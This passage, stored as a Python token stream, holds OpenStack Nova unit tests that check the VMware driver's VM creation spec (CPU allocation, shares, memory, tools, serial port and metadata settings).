op|'.'
name|'sentinel'
op|'.'
name|'value'
op|','
name|'res'
op|'.'
name|'extraConfig'
op|'['
number|'0'
op|']'
op|'.'
name|'value'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec
dedent|''
name|'def'
name|'test_get_vm_create_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'self'
op|'.'
name|'_create_vm_config_spec'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_serial_port
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_serial_port'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'serial_port_service_uri'
op|'='
string|"'foobar'"
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'serial_port_proxy_uri'
op|'='
string|"'telnet://example.com:31337'"
op|','
nl|'\n'
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
nl|'\n'
name|'serial_port_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_serial_port_spec'
op|'('
name|'fake_factory'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'self'
op|'.'
name|'_create_vm_config_spec'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
name|'serial_port_spec'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_allocations
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_allocations'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'vcpus'
newline|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_limit
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_limit'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_share
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_share'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'high'"
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'high'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_share_custom
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_share_custom'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'shares_level'
op|'='
string|"'custom'"
op|','
nl|'\n'
name|'shares_share'
op|'='
number|'1948'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
name|'constants'
op|'.'
name|'DEFAULT_OS_TYPE'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'cpu_allocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'custom'"
newline|'\n'
name|'cpu_allocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'1948'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpu_allocation'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_create_spec_with_metadata
dedent|''
name|'def'
name|'test_get_vm_create_spec_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'extra_specs'
op|','
nl|'\n'
name|'metadata'
op|'='
string|"'fake-metadata'"
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'expected'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'expected'
op|'.'
name|'annotation'
op|'='
string|"'fake-metadata'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'expected'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'expected'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vm
dedent|''
name|'def'
name|'test_create_vm'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'method'
op|'=='
string|"'CreateVM_Task'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'fake_create_vm_task'"
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|"'Should not get here....'"
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'self'
op|','
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'task_info'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'state'
op|'='
string|'"success"'
op|','
name|'result'
op|'='
string|'"fake_vm_ref"'
op|')'
newline|'\n'
name|'return'
name|'task_info'
newline|'\n'
nl|'\n'
dedent|''
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'fake_call_mock'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'side_effect'
op|'='
name|'fake_call_method'
op|')'
newline|'\n'
name|'fake_wait_mock'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'side_effect'
op|'='
name|'fake_wait_for_task'
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_mock'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_mock'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'wait_for_task'
op|','
name|'call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_ref'
op|'='
name|'vm_util'
op|'.'
name|'create_vm'
op|'('
nl|'\n'
name|'session'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'fake_vm_folder'"
op|','
nl|'\n'
